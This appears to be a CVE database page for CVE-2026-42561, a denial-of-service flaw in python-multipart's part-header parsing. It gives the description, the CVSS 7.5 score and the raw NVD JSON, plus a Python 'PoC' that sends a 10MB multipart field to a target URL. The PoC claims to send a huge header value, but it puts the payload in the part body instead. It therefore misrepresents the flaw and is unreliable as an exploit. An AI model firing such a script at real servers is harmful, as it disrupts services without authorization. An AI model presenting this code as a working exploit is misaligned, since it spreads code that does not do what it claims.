Security Vulnerability Report
中文
CVE-2026-42561 CVSS 7.5 HIGH

CVE-2026-42561

Published: 2026-05-13 21:16:47
Last Modified: 2026-05-14 17:00:31
Source: [email protected]

Description

Python-Multipart is a streaming multipart parser for Python. Prior to 0.0.27, python-multipart has a denial of service vulnerability in multipart part header parsing. When parsing multipart/form-data, MultipartParser previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion. This vulnerability is fixed in 0.0.27.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

python-multipart < 0.0.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def send_malicious_request(url): """ Conceptual PoC for CVE-2026-42561. Sends a request with a very large header value to trigger CPU exhaustion. """ # Generate a large string to simulate a large header value or part data large_value = "A" * 10000000 # 10MB string # In a real exploitation scenario, the attacker might need to manipulate raw sockets # to bypass client-side limits on header size. # Here we simulate sending a large payload in the multipart data. fields = { 'field_name': ('filename.txt', large_value, 'text/plain') } try: # Create the multipart encoder multipart_data = MultipartEncoder(fields=fields) headers = { 'Content-Type': multipart_data.content_type } # Send the POST request print(f"Sending malicious request to {url}...") response = requests.post(url, data=multipart_data, headers=headers, timeout=10) print(f"Request completed with status: {response.status_code}") except requests.exceptions.Timeout: print("Request timed out - potential DoS condition triggered.") except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": # Replace with the target URL target = "http://localhost:8000/upload" send_malicious_request(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42561", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:47.070", "lastModified": "2026-05-14T17:00:31.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Python-Multipart is a streaming multipart parser for Python. Prior to 0.0.27, python-multipart has a denial of service vulnerability in multipart part header parsing. When parsing multipart/form-data, MultipartParser previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion. This vulnerability is fixed in 0.0.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.